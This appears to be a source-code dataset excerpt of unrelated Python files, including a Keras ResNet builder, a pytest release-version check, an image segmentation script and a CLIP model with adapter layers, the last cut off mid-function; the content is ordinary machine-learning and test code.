def residual_bottleneck_block(filters, stage, block, strides=None, attention=None, cut='pre'):
def layer(input_tensor):
conv_params = get_conv_params()
bn_params = get_bn_params()
conv_name, bn_name, relu_name, sc_name = handle_block_names(stage, block)
x = layers.BatchNormalization(name=bn_name + '1', **bn_params)(input_tensor)
x = layers.Activation('relu', name=relu_name + '1')(x)
if cut == 'pre':
shortcut = input_tensor
elif cut == 'post':
shortcut = layers.Conv2D(filters * 4, (1, 1), name=sc_name, strides=strides, **conv_params)(x)
else:
raise ValueError('Cut type not in ["pre", "post"]')
x = layers.Conv2D(filters, (1, 1), name=conv_name + '1', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '2', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '2')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(filters, (3, 3), strides=strides, name=conv_name + '2', **conv_params)(x)
x = layers.BatchNormalization(name=bn_name + '3', **bn_params)(x)
x = layers.Activation('relu', name=relu_name + '3')(x)
x = layers.Conv2D(filters * 4, (1, 1), name=conv_name + '3', **conv_params)(x)
if attention is not None:
x = attention(x)
x = layers.Add()([x, shortcut])
return x
return layer
def ResNet(model_params, input_shape=None, input_tensor=None, include_top=True,
classes=1000, weights='imagenet', **kwargs):
global backend, layers, models, keras_utils
backend, layers, models, keras_utils = get_submodules_from_kwargs(kwargs)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, name='data')
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
ResidualBlock = model_params.residual_block
if model_params.attention:
Attention = model_params.attention(**kwargs)
else:
Attention = None
no_scale_bn_params = get_bn_params(scale=False)
bn_params = get_bn_params()
conv_params = get_conv_params()
init_filters = 64
print("Building custom resnet model")
x = layers.BatchNormalization(name='bn_data', **no_scale_bn_params)(img_input)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
x = layers.Conv2D(init_filters, (3, 3), strides=(1, 1), name='conv0', **conv_params)(x)
x = layers.BatchNormalization(name='bn0', **bn_params)(x)
x = layers.Activation('relu', name='relu0')(x)
x = layers.ZeroPadding2D(padding=(1, 1))(x)
for stage, rep in enumerate(model_params.repetitions):
for block in range(rep):
filters = init_filters * (2 ** stage)
if block == 0 and stage == 0:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='post', attention=Attention)(x)
elif block == 0:
x = ResidualBlock(filters, stage, block, strides=(2, 2),
cut='post', attention=Attention)(x)
else:
x = ResidualBlock(filters, stage, block, strides=(1, 1),
cut='pre', attention=Attention)(x)
x = layers.BatchNormalization(name='bn1', **bn_params)(x)
x = layers.Activation('relu', name='relu1')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='pool1')(x)
x = layers.Dense(classes, name='fc1')(x)
x = layers.Activation('softmax', name='softmax')(x)
if input_tensor is not None:
inputs = keras_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
model = models.Model(inputs, x)
if weights:
if type(weights) == str and os.path.exists(weights):
model.load_weights(weights)
else:
load_model_weights(model, model_params.model_name,
weights, classes, include_top, **kwargs)
return model
MODELS_PARAMS = {
'resnet18': ModelParams('resnet18', (2, 2, 2, 2), residual_conv_block, None),
'resnet34': ModelParams('resnet34', (3, 4, 6, 3), residual_conv_block, None),
'resnet50': ModelParams('resnet50', (3, 4, 6, 3), residual_bottleneck_block, None),
'resnet101': ModelParams('resnet101', (3, 4, 23, 3), residual_bottleneck_block, None),
'resnet152': ModelParams('resnet152', (3, 8, 36, 3), residual_bottleneck_block, None),
'seresnet18': ModelParams('seresnet18', (2, 2, 2, 2), residual_conv_block, ChannelSE),
'seresnet34': ModelParams('seresnet34', (3, 4, 6, 3), residual_conv_block, ChannelSE),
}
def ResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet50(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet50'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet101(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet101'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def ResNet152(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['resnet152'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet18(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet18'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def SEResNet34(input_shape=None, input_tensor=None, weights=None, classes=1000, include_top=True, **kwargs):
return ResNet(
MODELS_PARAMS['seresnet34'],
input_shape=input_shape,
input_tensor=input_tensor,
include_top=include_top,
classes=classes,
weights=weights,
**kwargs
)
def preprocess_input(x, **kwargs):
return x
setattr(ResNet18, '__doc__', ResNet.__doc__)
setattr(ResNet34, '__doc__', ResNet.__doc__)
setattr(ResNet50, '__doc__', ResNet.__doc__)
setattr(ResNet101, '__doc__', ResNet.__doc__)
setattr(ResNet152, '__doc__', ResNet.__doc__)
setattr(SEResNet18, '__doc__', ResNet.__doc__)
setattr(SEResNet34, '__doc__', ResNet.__doc__)
| true
| true
|
1c40e73ab629ea0dbb00732d80f05e8fcb8c73d4
| 2,385
|
py
|
Python
|
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
tests/test_release_checks.py
|
iRomi14/drmlib
|
0e7da6f9ec7aca3c167db667f1251b33c989bc5b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Performs some pre-release checks
"""
import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
"""
Checks if Version match with Git tag and if changelog is up to date.
"""
perform_once(__name__ + '.test_changelog_and_version')
from os.path import join
from subprocess import run, PIPE
from re import fullmatch
if not accelize_drm.pytest_build_environment:
pytest.skip("Can only be checked in build environment")
# Ensure tags are pulled
try:
run(['git', 'fetch', '--tags', '--force'],
stderr=PIPE, stdout=PIPE, universal_newlines=True)
except FileNotFoundError:
fail = (
pytest.fail if accelize_drm.pytest_build_type == 'debug' else
pytest.xfail)
fail('Git is required for this test.')
# Get head tag if any
result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
if result.returncode:
pytest.skip("Can only be checked on tagged git head")
tag = result.stdout.strip()
version = tag.lstrip('v')
# Checks tag format using library version
lib_ver = accelize_drm.get_api_version()
assert tag == 'v%s' % (lib_ver.version.split('+')[0])
    # Check that the tag format matches semantic versioning
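    # e.g. accepts "1.3.0" and "2.0.0-rc.1+build.5", rejects "1.03.0" or "v1.3"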
if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
pytest.fail('"%s" does not match semantic versioning format.' % version)
# Check if changelog is up-to-date (Not for prereleases)
if not lib_ver.prerelease:
changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
with open(changelog_path, 'rt') as changelog:
last_change = changelog.readline().strip()
assert fullmatch(
r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
last_change)
# Check prerelease format:
# Alpha: "1.0.0-alpha.1"
# Beta: "1.0.0-beta.1"
# Release candidate: "1.0.0-rc.1"
else:
assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| 34.071429
| 80
| 0.592872
|
import pytest
from tests.conftest import perform_once
def test_changelog_and_version(accelize_drm):
perform_once(__name__ + '.test_changelog_and_version')
from os.path import join
from subprocess import run, PIPE
from re import fullmatch
if not accelize_drm.pytest_build_environment:
pytest.skip("Can only be checked in build environment")
try:
run(['git', 'fetch', '--tags', '--force'],
stderr=PIPE, stdout=PIPE, universal_newlines=True)
except FileNotFoundError:
fail = (
pytest.fail if accelize_drm.pytest_build_type == 'debug' else
pytest.xfail)
fail('Git is required for this test.')
result = run(['git', 'describe', '--abbrev=0', '--exact-match', '--tags',
'HEAD'], stderr=PIPE, stdout=PIPE, universal_newlines=True)
if result.returncode:
pytest.skip("Can only be checked on tagged git head")
tag = result.stdout.strip()
version = tag.lstrip('v')
lib_ver = accelize_drm.get_api_version()
assert tag == 'v%s' % (lib_ver.version.split('+')[0])
if not fullmatch(r'^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)'
r'(-(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)'
r'(\.(0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*)?'
r'(\+[0-9a-zA-Z-]+(\.[0-9a-zA-Z-]+)*)?$', version):
pytest.fail('"%s" does not match semantic versioning format.' % version)
if not lib_ver.prerelease:
changelog_path = join(accelize_drm.pytest_build_source_dir, 'CHANGELOG')
with open(changelog_path, 'rt') as changelog:
last_change = changelog.readline().strip()
assert fullmatch(
r"\* [a-zA-Z]{3} [a-zA-Z]{3} [0-9]{2} [0-9]{4} Accelize " + tag,
last_change)
else:
assert fullmatch(r"(alpha|beta|rc)\.[0-9]+", lib_ver.prerelease)
| true
| true
|
1c40e745045a2c4157f067beefee2f2f2323a0a4
| 5,428
|
py
|
Python
|
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
legacy_code/double_raster_segmentation.py
|
alvinshi/Mobot_2018
|
2be14a771bc184bf92beb87b0ae4fd4d5deb36b2
|
[
"MIT"
] | null | null | null |
import math
import time
import cv2
import numpy as np
# adaptive thresholding method
def adaptive_thresholding(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
adaptive_threshed = cv2.adaptiveThreshold(img_grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 1)
cv2.imshow("adaptive", adaptive_threshed)
return adaptive_threshed
# Normalize the thresholded image to a binary image
def normalize(img):
normalizeImg = np.zeros_like(img)
normalizeImg[img == 255] = 1
return normalizeImg
def get_center(coordinates, colInterval):
SIZE_THRESHOLD = 30
index = 0
centers = []
    while index < len(coordinates) and coordinates[index] is not None:
        if (len(coordinates[index]) > SIZE_THRESHOLD):
sums = [0,0]
for i in coordinates[index]:
(row, col) = i
sums[0] = sums[0] + row
sums[1] = sums[1] + col
sums[0] = int(math.floor(sums[0] / len(coordinates[index])))
sums[1] = int(math.floor(sums[1] / len(coordinates[index]))) + colInterval
sums = switchRowCol(sums)
centers.append(tuple(sums))
index = index + 1
return centers
# Switch the row and col for the drawing function
def switchRowCol(origCoor):
col = origCoor[1]
row = origCoor[0]
return [col, row]
# add the coordinates of same label to "coordinates"
def addCoordinates(coorNum, label, labelCoor, startRow, coordinates):
for index in range(0, coorNum):
labelCoor[index][0] = labelCoor[index][0] + startRow
#labelCoorT = switchRowCol(labelCoor[index])
        if coordinates[label-2] is not None:
coordinates[label-2].append(labelCoor[index])
else:
coordinates[label-2] = [labelCoor[index]]
# double raster for image segmentation
# returns the center coordinates of each of the segment
def double_raster(imgTakein, startRow, colInterval):
# take in binary image; startRow is the start row of the current image slice
img = normalize(imgTakein)
cur_label=2
coordinates = [None] * 50
eq=[0] * len(img)*len(img[0])
for row in range(0,len(img)):
for col in range(0,len(img[row])):
if(img[row][col]==1):
if(row>0):
up=img[row-1][col]
else:
up=0
if(col>0):
left=img[row,col-1]
else:
left=0
if(up==0 and left==0):
img[row][col]=cur_label
cur_label=cur_label+1
elif(up!=0 and left!=0):
img[row][col]=min(up,left)
if(up!=left):
eq[max(up,left)]=min(up,left)
a=min(up,left)
while(eq[a]!=0):
eq[max(up,left)]=eq[a]
a=eq[a]
elif(up==0 or left==0):
img[row][col]=max(up,left)
    # the nested for loop of the second sweep was replaced with the code below, which is 5-6 seconds faster
max_label = cur_label # record the max label number
labelPixNumber = [0] * max_label # The number of pixels in each label
coorAdded = False # switch of whether the coordinates has been recorded
    for label in range(2, max_label):  # labels start at 2; 0 is background
labelCoor = np.argwhere(img == label) # get the coordinates of pixels with same label
coorNum = len(labelCoor)
labelPixNumber[label] = coorNum
if (eq[label] != 0):
eqLabel = eq[label]
            img[img == label] = eqLabel  # relabel to the equivalent (smaller) label
# Add the number of pixels of the current label to the equiv label
# and set the current label pixel number to 0
labelPixNumber[eqLabel] = labelPixNumber[eqLabel] + labelPixNumber[label]
labelPixNumber[label] = 0
addCoordinates(coorNum, eqLabel, labelCoor, startRow, coordinates)
coorAdded = True
if not coorAdded:
addCoordinates(coorNum, label, labelCoor, startRow, coordinates)
coorAdded = False
centers = get_center(coordinates, colInterval)
# print("finished double raster for one slice of image")
return centers
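# Example behaviour (hedged): for a 0/255 mask containing two well-separated
# blobs larger than SIZE_THRESHOLD pixels, double_raster returns one (col, row)
# centroid per blob, with startRow added to rows and colInterval added to columns.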
# Returns 1. per-slice segment centers
#         2. per-slice connected-component (block) centers
def row_segment_center(img, NUM_SEGS, colInterval):
global doubleRasterTime
# Segment the original image into 20 segments
numSegs = NUM_SEGS
numRows = img.shape[0]
numCols = img.shape[1]
    rowInterval = numRows // numSegs  # integer slice height for indexing
segmentCenters = [None] * numSegs
blockCenters = []
startRow = 0
for i in range(0, numSegs):
imgSeg = img[startRow:startRow+rowInterval, 0:numCols]
# Threshold imageSegments and calculate the centor of each segments
coor = np.argwhere(imgSeg == 255)
if len(coor) == 0:
            rmean = img.shape[0] // 2
            cmean = img.shape[1] // 2
else:
rmean=int(math.floor(np.mean(coor[:,0])))
cmean=int(math.floor(np.mean(coor[:,1])))
segmentCenters[i] = (cmean+colInterval, startRow+rmean)
        doubleRasterStart = time.time()
        blockCenters.append(double_raster(imgSeg, startRow, colInterval))
        doubleRasterEnd = time.time()
        doubleRasterTime += doubleRasterEnd - doubleRasterStart
        startRow = startRow + rowInterval  # advance to the next slice
return segmentCenters, blockCenters
| 39.333333
| 122
| 0.595431
|
import math
import time
import cv2
import numpy as np
def adaptive_thresholding(img):
img_grey = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
adaptive_threshed = cv2.adaptiveThreshold(img_grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 1)
cv2.imshow("adaptive", adaptive_threshed)
return adaptive_threshed
def normalize(img):
normalizeImg = np.zeros_like(img)
normalizeImg[img == 255] = 1
return normalizeImg
def get_center(coordinates, colInterval):
SIZE_THRESHOLD = 30
index = 0
centers = []
    while index < len(coordinates) and coordinates[index] is not None:
        if (len(coordinates[index]) > SIZE_THRESHOLD):
sums = [0,0]
for i in coordinates[index]:
(row, col) = i
sums[0] = sums[0] + row
sums[1] = sums[1] + col
sums[0] = int(math.floor(sums[0] / len(coordinates[index])))
sums[1] = int(math.floor(sums[1] / len(coordinates[index]))) + colInterval
sums = switchRowCol(sums)
centers.append(tuple(sums))
index = index + 1
return centers
def switchRowCol(origCoor):
col = origCoor[1]
row = origCoor[0]
return [col, row]
def addCoordinates(coorNum, label, labelCoor, startRow, coordinates):
for index in range(0, coorNum):
labelCoor[index][0] = labelCoor[index][0] + startRow
        if coordinates[label-2] is not None:
coordinates[label-2].append(labelCoor[index])
else:
coordinates[label-2] = [labelCoor[index]]
def double_raster(imgTakein, startRow, colInterval):
img = normalize(imgTakein)
cur_label=2
coordinates = [None] * 50
eq=[0] * len(img)*len(img[0])
for row in range(0,len(img)):
for col in range(0,len(img[row])):
if(img[row][col]==1):
if(row>0):
up=img[row-1][col]
else:
up=0
if(col>0):
left=img[row,col-1]
else:
left=0
if(up==0 and left==0):
img[row][col]=cur_label
cur_label=cur_label+1
elif(up!=0 and left!=0):
img[row][col]=min(up,left)
if(up!=left):
eq[max(up,left)]=min(up,left)
a=min(up,left)
while(eq[a]!=0):
eq[max(up,left)]=eq[a]
a=eq[a]
elif(up==0 or left==0):
img[row][col]=max(up,left)
max_label = cur_label
labelPixNumber = [0] * max_label
coorAdded = False
for label in range(2, max_label):
labelCoor = np.argwhere(img == label)
coorNum = len(labelCoor)
labelPixNumber[label] = coorNum
if (eq[label] != 0):
eqLabel = eq[label]
img = eqLabel * (img == label) + img
labelPixNumber[eqLabel] = labelPixNumber[eqLabel] + labelPixNumber[label]
labelPixNumber[label] = 0
addCoordinates(coorNum, eqLabel, labelCoor, startRow, coordinates)
coorAdded = True
if not coorAdded:
addCoordinates(coorNum, label, labelCoor, startRow, coordinates)
coorAdded = False
centers = get_center(coordinates, colInterval)
return centers
def row_segment_center(img, NUM_SEGS, colInterval):
global doubleRasterTime
numSegs = NUM_SEGS
numRows = img.shape[0]
numCols = img.shape[1]
rowInterval = numRows // numSegs
segmentCenters = [None] * numSegs
blockCenters = []
startRow = 0
for i in range(0, numSegs):
imgSeg = img[startRow:startRow+rowInterval, 0:numCols]
coor = np.argwhere(imgSeg == 255)
if len(coor) == 0:
rmean = img.shape[0] // 2
cmean = img.shape[1] // 2
else:
rmean=int(math.floor(np.mean(coor[:,0])))
cmean=int(math.floor(np.mean(coor[:,1])))
segmentCenters[i] = (cmean+colInterval, startRow+rmean)
startRow = startRow + rowInterval
doubleRasterStart = time.time()
blockCenters.append(double_raster(imgSeg, startRow, colInterval))
doubleRasterEnd = time.time()
doubleRasterTime += doubleRasterEnd - doubleRasterStart
return segmentCenters, blockCenters
| true
| true
|
1c40e7a65f2d0aa486c11a4dc3d2889b1385309c
| 20,991
|
py
|
Python
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 41
|
2021-12-14T02:50:16.000Z
|
2022-03-30T07:41:19.000Z
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 1
|
2022-01-07T03:31:47.000Z
|
2022-03-25T00:31:53.000Z
|
CLIP-ViL/clip/model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 2
|
2021-12-14T03:10:18.000Z
|
2022-03-29T04:59:23.000Z
|
from collections import OrderedDict
from typing import Tuple, Union
import torch
import torch.nn.functional as F
from torch import nn
class VisualAdapter(nn.Module):
"""Conventional Adapter layer, in which the weights of up and down sampler modules
are parameters and are optimized."""
def __init__(self, input_dim, output_dim, adapter_kind, reduction_factor=16, use_bn=True, use_gate=True):
super().__init__()
self.adapter_kind = adapter_kind
self.use_bn = use_bn
if use_gate:
self.gate = nn.Parameter(torch.zeros(1))
else:
self.gate = None
if adapter_kind == "bottleneck":
self.down_sample_size = input_dim // reduction_factor
self.activation = nn.ReLU(inplace=True)
self.down_sampler = nn.Conv2d(input_dim, self.down_sample_size, 1, bias=False)
self.up_sampler = nn.Conv2d(self.down_sample_size, output_dim, 1, bias=False)
if use_bn:
self.bn1 = nn.BatchNorm2d(self.down_sample_size)
self.bn2 = nn.BatchNorm2d(output_dim)
elif adapter_kind == "basic":
self.activation = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(input_dim, output_dim, 1, bias=False)
if use_bn:
self.bn = nn.BatchNorm2d(output_dim)
else:
raise NotImplementedError
def forward(self, x):
if self.adapter_kind == "bottleneck":
z = self.down_sampler(x)
z = self.bn1(z) if self.use_bn else z
z = self.activation(z)
output = self.up_sampler(z)
output = self.bn2(output) if self.use_bn else output
elif self.adapter_kind == "basic":
output = self.conv(x)
output = self.bn(output) if self.use_bn else output
if self.gate is not None:
output = self.gate * output
return output
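# Minimal usage sketch (assumption: the shapes below are chosen purely for
# illustration):
#
#   adapter = VisualAdapter(input_dim=256, output_dim=256,
#                           adapter_kind="bottleneck", reduction_factor=16)
#   feats = torch.randn(2, 256, 14, 14)   # N x C x H x W feature map
#   delta = adapter(feats)                # same spatial size as the input
#
# With use_gate=True the gate parameter starts at zero, so delta is zero at
# initialisation and the adapter behaves as an identity-preserving residual branch.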
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, adapter_config=None):
super().__init__()
# all conv layers have stride 1. an avgpool is performed after the second convolution when stride > 1
self.conv1 = nn.Conv2d(inplanes, planes, 1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, 3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.avgpool = nn.AvgPool2d(stride) if stride > 1 else nn.Identity()
self.conv3 = nn.Conv2d(planes, planes * self.expansion, 1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = None
self.stride = stride
self.adapter = None
if adapter_config is not None:
self.adapter = VisualAdapter(planes, planes, "basic", adapter_config.reduction_factor, True, adapter_config.use_gate)
if stride > 1 or inplanes != planes * Bottleneck.expansion:
# downsampling layer is prepended with an avgpool, and the subsequent convolution has stride 1
self.downsample = nn.Sequential(OrderedDict([
("-1", nn.AvgPool2d(stride)),
("0", nn.Conv2d(inplanes, planes * self.expansion, 1, stride=1, bias=False)),
("1", nn.BatchNorm2d(planes * self.expansion))
]))
def forward(self, x: torch.Tensor):
identity = x
out = self.relu(self.bn1(self.conv1(x)))
if self.adapter is not None:
adapter_out = self.adapter(out)
out = self.bn2(self.conv2(out))
out = self.relu(adapter_out + out)
else:
out = self.relu(self.bn2(self.conv2(out)))
out = self.avgpool(out)
out = self.bn3(self.conv3(out))
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class AttentionPool2d(nn.Module):
def __init__(self, spacial_dim: int, embed_dim: int, num_heads: int, output_dim: int = None):
super().__init__()
self.positional_embedding = nn.Parameter(torch.randn(spacial_dim ** 2 + 1, embed_dim) / embed_dim ** 0.5)
self.k_proj = nn.Linear(embed_dim, embed_dim)
self.q_proj = nn.Linear(embed_dim, embed_dim)
self.v_proj = nn.Linear(embed_dim, embed_dim)
self.c_proj = nn.Linear(embed_dim, output_dim or embed_dim)
self.num_heads = num_heads
def forward(self, x):
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3]).permute(2, 0, 1) # NCHW -> (HW)NC
x = torch.cat([x.mean(dim=0, keepdim=True), x], dim=0) # (HW+1)NC
x = x + self.positional_embedding[:, None, :].to(x.dtype) # (HW+1)NC
x, _ = F.multi_head_attention_forward(
query=x, key=x, value=x,
embed_dim_to_check=x.shape[-1],
num_heads=self.num_heads,
q_proj_weight=self.q_proj.weight,
k_proj_weight=self.k_proj.weight,
v_proj_weight=self.v_proj.weight,
in_proj_weight=None,
in_proj_bias=torch.cat([self.q_proj.bias, self.k_proj.bias, self.v_proj.bias]),
bias_k=None,
bias_v=None,
add_zero_attn=False,
dropout_p=0,
out_proj_weight=self.c_proj.weight,
out_proj_bias=self.c_proj.bias,
use_separate_proj_weight=True,
training=self.training,
need_weights=False
)
return x[0]
class ModifiedResNet(nn.Module):
"""
A ResNet class that is similar to torchvision's but contains the following changes:
- There are now 3 "stem" convolutions as opposed to 1, with an average pool instead of a max pool.
- Performs anti-aliasing strided convolutions, where an avgpool is prepended to convolutions with stride > 1
- The final pooling layer is a QKV attention instead of an average pool
"""
def __init__(self, layers, output_dim, heads, input_resolution=224, width=64, adapter_config=None):
super().__init__()
self.output_dim = output_dim
self.input_resolution = input_resolution
self.adapter_config = adapter_config
# the 3-layer stem
self.conv1 = nn.Conv2d(3, width // 2, kernel_size=3, stride=2, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(width // 2)
self.conv2 = nn.Conv2d(width // 2, width // 2, kernel_size=3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(width // 2)
self.conv3 = nn.Conv2d(width // 2, width, kernel_size=3, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(width)
self.avgpool = nn.AvgPool2d(2)
self.relu = nn.ReLU(inplace=True)
# residual layers
self._inplanes = width # this is a *mutable* variable used during construction
self.layer1 = self._make_layer(width, layers[0])
self.layer2 = self._make_layer(width * 2, layers[1], stride=2)
self.layer3 = self._make_layer(width * 4, layers[2], stride=2)
self.layer4 = self._make_layer(width * 8, layers[3], stride=2)
embed_dim = width * 32 # the ResNet feature dimension
self.attnpool = AttentionPool2d(input_resolution // 32, embed_dim, heads, output_dim)
def _make_layer(self, planes, blocks, stride=1):
layers = [Bottleneck(self._inplanes, planes, stride, adapter_config=self.adapter_config)]
self._inplanes = planes * Bottleneck.expansion
for _ in range(1, blocks):
layers.append(Bottleneck(self._inplanes, planes, adapter_config=self.adapter_config))
return nn.Sequential(*layers)
def forward(self, x, skip_last_layer=False):
def stem(x):
for conv, bn in [(self.conv1, self.bn1), (self.conv2, self.bn2), (self.conv3, self.bn3)]:
x = self.relu(bn(conv(x)))
x = self.avgpool(x)
return x
x = x.type(self.conv1.weight.dtype)
x = stem(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
if not skip_last_layer:
x = self.attnpool(x)
return x
class LayerNorm(nn.LayerNorm):
"""Subclass torch's LayerNorm to handle fp16."""
def forward(self, x: torch.Tensor):
orig_type = x.dtype
ret = super().forward(x.type(torch.float32))
return ret.type(orig_type)
class QuickGELU(nn.Module):
def forward(self, x: torch.Tensor):
return x * torch.sigmoid(1.702 * x)
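# QuickGELU is the sigmoid approximation used by the original CLIP release.
# A quick numerical check against torch's exact GELU (illustrative only):
#
#   x = torch.linspace(-3, 3, 7)
#   approx = x * torch.sigmoid(1.702 * x)
#   exact = torch.nn.functional.gelu(x)
#   print((approx - exact).abs().max())   # small, on the order of 1e-2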
class ResidualAttentionBlock(nn.Module):
def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None):
super().__init__()
self.attn = nn.MultiheadAttention(d_model, n_head)
self.ln_1 = LayerNorm(d_model)
self.mlp = nn.Sequential(OrderedDict([
("c_fc", nn.Linear(d_model, d_model * 4)),
("gelu", QuickGELU()),
("c_proj", nn.Linear(d_model * 4, d_model))
]))
self.ln_2 = LayerNorm(d_model)
self.attn_mask = attn_mask
def attention(self, x: torch.Tensor, text_mask=None):
if text_mask is None:
text_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None
return self.attn(x, x, x, need_weights=False, attn_mask=text_mask)[0]
def forward(self, x: torch.Tensor, text_mask = None):
x = x + self.attention(self.ln_1(x), text_mask = text_mask)
x = x + self.mlp(self.ln_2(x))
return x
class Transformer(nn.Module):
def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None):
super().__init__()
self.width = width
self.layers = layers
self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])
def forward(self, x: torch.Tensor, text_mask=None):
for layer in self.resblocks:
x = layer(x, text_mask = text_mask)
return x
class VisualTransformer(nn.Module):
def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int, output_dim: int):
super().__init__()
self.input_resolution = input_resolution
self.output_dim = output_dim
self.heads = heads
self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)
scale = width ** -0.5
self.class_embedding = nn.Parameter(scale * torch.randn(width))
self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))
self.ln_pre = LayerNorm(width)
self.transformer = Transformer(width, layers, heads)
self.ln_post = LayerNorm(width)
self.proj = nn.Parameter(scale * torch.randn(width, output_dim))
def forward(self, x: torch.Tensor, skip_last_layer=False, text_embedding=None, text_mask=None):
x = self.conv1(x) # shape = [*, width, grid, grid]
x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2]
x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]
x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]
x = x + self.positional_embedding.to(x.dtype)
x = self.ln_pre(x)
x = x.permute(1, 0, 2) # NLD -> LND
if text_embedding is not None:
text_embedding = text_embedding.transpose(0, 1)
joint_embeddings = torch.cat((text_embedding, x), dim=0)
# Current language mask: batch x seq_len
text_mask = torch.cat(
(text_mask, torch.zeros(x.size(1), x.size(0)).float().to(x.device)),
dim=1)
# batch * heads x (seq_len + image_len)
text_mask = torch.cat([text_mask for i in range(self.heads)], dim=0)
